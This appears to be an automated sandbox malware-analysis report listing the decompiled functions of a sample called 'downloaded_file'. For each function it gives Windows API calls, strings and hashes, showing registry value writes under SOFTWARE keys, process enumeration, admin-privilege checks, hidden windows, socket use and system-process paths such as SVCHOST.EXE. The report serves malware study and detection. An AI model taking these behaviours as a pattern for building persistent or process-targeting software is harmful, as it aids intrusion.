                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Alloc$CreateDirectoryProcessSystem__snwprintf_memsetlstrlen
                                                                                                            • String ID: D
                                                                                                            • API String ID: 2329958830-2746444292
                                                                                                            • Opcode ID: a610079094f1f3c0259db5fef600a96893261d76de5673a70986022be0616a5d
                                                                                                            • Instruction ID: 050427e8486c59ee08d10ebc1427bec5b39a3a0642e1235235c0c4c0c041c586
                                                                                                            • Opcode Fuzzy Hash: a610079094f1f3c0259db5fef600a96893261d76de5673a70986022be0616a5d
                                                                                                            • Instruction Fuzzy Hash: DD3164B5A50208FBDB21DBA4DC89FED7B78AF48700F104598F609AB1D0DA755AC4CB51
                                                                                                            Function 00309670 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 86registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 003081C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,00308D2B,00316B10,00000000), ref: 003081EB
                                                                                                              • Part of subcall function 003081C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,00308D2B), ref: 00308205
                                                                                                              • Part of subcall function 003081C0: wnsprintfW.SHLWAPI ref: 00308235
                                                                                                              • Part of subcall function 003081C0: wnsprintfW.SHLWAPI ref: 00308251
                                                                                                              • Part of subcall function 003081C0: LocalFree.KERNEL32(00000000), ref: 00308A43
                                                                                                              • Part of subcall function 00301C60: _wcsrchr.LIBCMT ref: 00301C6C
                                                                                                            • _memset.LIBCMT ref: 003096E5
                                                                                                            • __snwprintf.LIBCMT ref: 00309703
                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F013F,?), ref: 00309722
                                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000003,00000000,00000000), ref: 0030974B
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00309759
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00309763
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030976D
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030977E
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00309788
                                                                                                            Strings
                                                                                                            • SOFTWARE\%s, xrefs: 003096F2
                                                                                                            • {D961EA11-3F69-43D1-8581-E526BBBDC738}, xrefs: 003096ED
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Allocwnsprintf$CloseOpenQueryValue__snwprintf_memset_wcsrchr
                                                                                                            • String ID: SOFTWARE\%s${D961EA11-3F69-43D1-8581-E526BBBDC738}
                                                                                                            • API String ID: 1140279918-2066183920
                                                                                                            • Opcode ID: abafae7090abaa874752fb81d2652bf069c226358e0ccd6ba3e1603e3899f01d
                                                                                                            • Instruction ID: fd62182d13b8feaf8d8082c3b02a29dec917cf13bb4c9529bc49393b32bc753e
                                                                                                            • Opcode Fuzzy Hash: abafae7090abaa874752fb81d2652bf069c226358e0ccd6ba3e1603e3899f01d
                                                                                                            • Instruction Fuzzy Hash: 0D314375A10208BBDB25DFA4DC59FEEB778EF48700F104599F609AB180D6759B84CF50
                                                                                                            Function 003226F0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 86memorystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000280), ref: 00322700
                                                                                                            • lstrcpyW.KERNEL32(0000001C,CPU001), ref: 00322735
                                                                                                              • Part of subcall function 0031C3A0: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0031C3DB
                                                                                                              • Part of subcall function 0031C3A0: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0031C3F4
                                                                                                              • Part of subcall function 0031C3A0: FreeSid.ADVAPI32(?), ref: 0031C409
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00322754
                                                                                                            • LocalFree.KERNEL32(00000020), ref: 00322762
                                                                                                            • LocalFree.KERNEL32(00000020), ref: 00322796
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeLocal$AllocAllocateCheckFileInitializeMembershipModuleNameTokenlstrcpy
                                                                                                            • String ID: %s [%d]$CPU001
                                                                                                            • API String ID: 2255487582-1715046084
                                                                                                            • Opcode ID: a2b5656e9dc3ea14e8dc4765eb2aabee7b7788d61ee720956354e8cf4792936c
                                                                                                            • Instruction ID: bc0689fe6e4e356e17178ede15e344a5b664eca42f0122e33a2d216ed72ee6f1
                                                                                                            • Opcode Fuzzy Hash: a2b5656e9dc3ea14e8dc4765eb2aabee7b7788d61ee720956354e8cf4792936c
                                                                                                            • Instruction Fuzzy Hash: B1314FB4D00218BFD725DBA4EC8DBEEB7B4EF48304F5085A8E50AAA251D7749A84CF50
                                                                                                            Function 00322450 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 75memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CoInitialize.OLE32(00000000), ref: 00322466
                                                                                                            • CoCreateGuid.COMBASE(c 2), ref: 00322478
                                                                                                            • StringFromGUID2.COMBASE(c 2,?,00000027), ref: 00322490
                                                                                                            • wsprintfA.USER32 ref: 003224AB
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000068), ref: 003224B8
                                                                                                            • und_memcpy.LIBCMTD ref: 00322505
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00322511
                                                                                                            • CoUninitialize.COMBASE ref: 00322517
                                                                                                            • CoUninitialize.COMBASE ref: 00322524
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LocalUninitialize$AllocCreateFreeFromGuidInitializeStringund_memcpywsprintf
                                                                                                            • String ID: c 2$c 2
                                                                                                            • API String ID: 3539965953-3287113700
                                                                                                            • Opcode ID: a97fa9efdd2b813f0f6b2d4e0b629bae99d42f2e9246c03cd28b71e97daf9948
                                                                                                            • Instruction ID: 10e2ca0d367f19a0ac604d7d5f4708030127c485ef9478e926cc77435b56a637
                                                                                                            • Opcode Fuzzy Hash: a97fa9efdd2b813f0f6b2d4e0b629bae99d42f2e9246c03cd28b71e97daf9948
                                                                                                            • Instruction Fuzzy Hash: 8A21C8B5A00304ABDB16DFA4EC49F9F77BDAF48305F004528F90D9B281E631E944CB51
                                                                                                            Function 0031ACE0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72windowregistryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0031ACE8
                                                                                                            • _memset.LIBCMT ref: 0031ACFB
                                                                                                            • RegisterClassW.USER32(?), ref: 0031AD1E
                                                                                                            • GetLastError.KERNEL32 ref: 0031AD30
                                                                                                            • CreateWindowExW.USER32(00000000,{3423A12F-92CE-4AE6-962F-DE5D526886C1},0033705C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0031AD64
                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0031AD87
                                                                                                            • TranslateMessage.USER32(?), ref: 0031AD95
                                                                                                            • DispatchMessageW.USER32(?), ref: 0031AD9F
                                                                                                            • DestroyWindow.USER32(00000000), ref: 0031ADAD
                                                                                                            • UnregisterClassW.USER32({3423A12F-92CE-4AE6-962F-DE5D526886C1},00000000), ref: 0031ADC5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Message$ClassWindow$CreateDestroyDispatchErrorHandleLastModuleRegisterTranslateUnregister_memset
                                                                                                            • String ID: {3423A12F-92CE-4AE6-962F-DE5D526886C1}
                                                                                                            • API String ID: 1736019982-437755030
                                                                                                            • Opcode ID: cfa440d83c0b1583b9d4eea2ac099247b56dd65c89977a255be5e699cef7d1ec
                                                                                                            • Instruction ID: e41b2aeaa59aae9e4b934ee85b5784ad192c5658b6fd2ba65ac8e3b98886c8ff
                                                                                                            • Opcode Fuzzy Hash: cfa440d83c0b1583b9d4eea2ac099247b56dd65c89977a255be5e699cef7d1ec
                                                                                                            • Instruction Fuzzy Hash: 21218070941604EBD72A9FA0ED99BDE7BBCAB08702F008418E605A61E1EBB49985DF51
                                                                                                            Function 003176F0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72windowregistryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 003176F8
                                                                                                            • _memset.LIBCMT ref: 0031770B
                                                                                                            • RegisterClassW.USER32(?), ref: 0031772E
                                                                                                            • GetLastError.KERNEL32 ref: 00317740
                                                                                                            • CreateWindowExW.USER32(00000000,{9C8B46D6-3D59-421D-A2D1-8F95C9197AC8},003349E4,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00317774
                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00317797
                                                                                                            • TranslateMessage.USER32(?), ref: 003177A5
                                                                                                            • DispatchMessageW.USER32(?), ref: 003177AF
                                                                                                            • DestroyWindow.USER32(00000000), ref: 003177BD
                                                                                                            • UnregisterClassW.USER32({9C8B46D6-3D59-421D-A2D1-8F95C9197AC8},00000000), ref: 003177D5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Message$ClassWindow$CreateDestroyDispatchErrorHandleLastModuleRegisterTranslateUnregister_memset
                                                                                                            • String ID: {9C8B46D6-3D59-421D-A2D1-8F95C9197AC8}
                                                                                                            • API String ID: 1736019982-1830929042
                                                                                                            • Opcode ID: f00d0042c4d2c0c8e335671dc0d61eb239018f1e948620eab4fbe8c23d899b5f
                                                                                                            • Instruction ID: 77169be8e64fe3d59fc942b140b51212e9544dd51d6326126b497fb0f8ac8423
                                                                                                            • Opcode Fuzzy Hash: f00d0042c4d2c0c8e335671dc0d61eb239018f1e948620eab4fbe8c23d899b5f
                                                                                                            • Instruction Fuzzy Hash: 9F217F75950204ABD727DFA0EC4AFAD7B7DEB08701F14901DE50DA62D0DB745985CF60
                                                                                                            Function 00309EE0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 60registrystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _memset.LIBCMT ref: 00309F00
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00309F16
                                                                                                            • __snwprintf.LIBCMT ref: 00309F3A
                                                                                                            • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 00309F55
                                                                                                            • lstrlenW.KERNEL32(?), ref: 00309F66
                                                                                                            • RegSetValueExW.ADVAPI32(?,{C3120582-398C-4F3B-A956-7E9F9DB9EF8E},00000000,00000001,?,00000002), ref: 00309F88
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00309F99
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00309FAD
                                                                                                            Strings
                                                                                                            • {C3120582-398C-4F3B-A956-7E9F9DB9EF8E}, xrefs: 00309F7C
                                                                                                            • {BB52E685-57DB-490D-A4DD-CCF2F7D90D58}, xrefs: 00309F24
                                                                                                            • SOFTWARE\%s, xrefs: 00309F29
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Close$FileModuleNameOpenValue__snwprintf_memsetlstrlen
                                                                                                            • String ID: SOFTWARE\%s${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}${C3120582-398C-4F3B-A956-7E9F9DB9EF8E}
                                                                                                            • API String ID: 1214033602-3858757917
                                                                                                            • Opcode ID: abbca84b1737c3124d3cf6d625bad9abe57056434fcacf7e0e0287fdb2458cd4
                                                                                                            • Instruction ID: 221f820a65c42a26ad9b25fd998154a1f9de99ed4cda6fec735c435fb9a9b3ad
                                                                                                            • Opcode Fuzzy Hash: abbca84b1737c3124d3cf6d625bad9abe57056434fcacf7e0e0287fdb2458cd4
                                                                                                            • Instruction Fuzzy Hash: E311B2B5A40314ABD731DB60DC4DFEA737CAF44B00F104688F61DDA092EAB59A84CBA1
                                                                                                            Function 00302640 Relevance: 18.2, APIs: 12, Instructions: 187stringprocessmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00302694
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003026B2
                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 003026DA
                                                                                                            • lstrcmpiW.KERNEL32(?,-00372F28,00000000,?,?,?,?,?), ref: 0030278C
                                                                                                            • _memset.LIBCMT ref: 003027B1
                                                                                                            • lstrcpyW.KERNEL32(?,-00372F28,?,?,?,?,?,?,?), ref: 003027CF
                                                                                                              • Part of subcall function 00301C60: _wcsrchr.LIBCMT ref: 00301C6C
                                                                                                            • lstrcpyW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00302815
                                                                                                              • Part of subcall function 00302A80: construct.LIBCPMTD ref: 00302B09
                                                                                                            • StrCatW.SHLWAPI(00000000,00332714), ref: 00302863
                                                                                                            • StrCatW.SHLWAPI(00000000,?), ref: 00302874
                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 003028D6
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003028E8
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003028F8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LocalProcess32lstrcpy$AllocCloseCreateFirstFreeHandleNextSnapshotToolhelp32_memset_wcsrchrconstructlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 4081567023-0
                                                                                                            • Opcode ID: cd9585dbd19bc1fc422441f40e542d67354e53185be0c209879bf922c800fab2
                                                                                                            • Instruction ID: 89aad3f27e0c93ffb7f75e1a41dab5cca40ed1b17b98aaf56d07f5d6862c20ee
                                                                                                            • Opcode Fuzzy Hash: cd9585dbd19bc1fc422441f40e542d67354e53185be0c209879bf922c800fab2
                                                                                                            • Instruction Fuzzy Hash: C38152B1D05218DBCB26DBA4CC99BDEB778BF58300F104598E11ABB190DB745A88CF60
                                                                                                            Function 00309CE0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 61COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetWindowsDirectoryW.KERNEL32(8U0,00000104,?,00305538,00000000), ref: 00309CF2
                                                                                                            • __snwprintf.LIBCMT ref: 00309D0E
                                                                                                            • GetSystemDirectoryW.KERNEL32(8U0,00000104), ref: 00309D2E
                                                                                                            • __snwprintf.LIBCMT ref: 00309D4A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Directory__snwprintf$SystemWindows
                                                                                                            • String ID: %s\CMD.EXE$%s\EXPLORER.EXE$%s\SVCHOST.EXE$8U0
                                                                                                            • API String ID: 2322266053-1472804483
                                                                                                            • Opcode ID: 6540ef587ec4f50627a97a16b6be48d9210ec444e3962cd1c25e67ea7e6bedca
                                                                                                            • Instruction ID: 61b7c5c1bb2a5c2355c1e468652df7bb82633da7f7bafb9fe0ba72180c0fcaaf
                                                                                                            • Opcode Fuzzy Hash: 6540ef587ec4f50627a97a16b6be48d9210ec444e3962cd1c25e67ea7e6bedca
                                                                                                            • Instruction Fuzzy Hash: FB1154B1681344ABEF16DE54DC95FBB376DAB45700F14881EFA188E1C1D6B4D980CB51
                                                                                                            Function 00306E80 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 230synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 00306EEB
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 0030702F
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00307073
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003070B5
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00307117
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 003071A5
                                                                                                            • shutdown.WS2_32(?,00000002), ref: 0030723B
                                                                                                            • closesocket.WS2_32(?), ref: 00307245
                                                                                                              • Part of subcall function 00320CD0: ___crtGetLocaleInfoEx.LIBCMTD ref: 00320CED
                                                                                                              • Part of subcall function 00320950: ___crtGetLocaleInfoEx.LIBCMTD ref: 0032096D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleInfoLocale___crt$EventFreeObjectSingleVirtualWaitclosesocketsetsockoptshutdown
                                                                                                            • String ID: d
                                                                                                            • API String ID: 3427925336-2564639436
                                                                                                            • Opcode ID: 0ec0086ef559574b65ab97bad19bf1729a1a014d2f38465e30eea2cded1cd4b6
                                                                                                            • Instruction ID: 6541e96eb61f24bb9950641735fd724fb11962441ba344d0dcac89085b8e6d51
                                                                                                            • Opcode Fuzzy Hash: 0ec0086ef559574b65ab97bad19bf1729a1a014d2f38465e30eea2cded1cd4b6
                                                                                                            • Instruction Fuzzy Hash: A0A14C71D001189FEB29DFA4CC95FAEB775FB54304F1082A8E119AB2C2D775AA85CF50
                                                                                                            Function 003174B0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 97threadsynchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000,?,0031720B,?), ref: 003174EB
                                                                                                            • CloseHandle.KERNEL32(00000000,?,0031720B,?), ref: 00317523
                                                                                                            • CloseHandle.KERNEL32(00000000,?,0031720B,?), ref: 00317543
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,0031720B,?), ref: 0031755B
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,?,00000004,00000000), ref: 0031757A
                                                                                                            • ResumeThread.KERNEL32(00000000), ref: 003175A8
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003175BE
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003175C8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
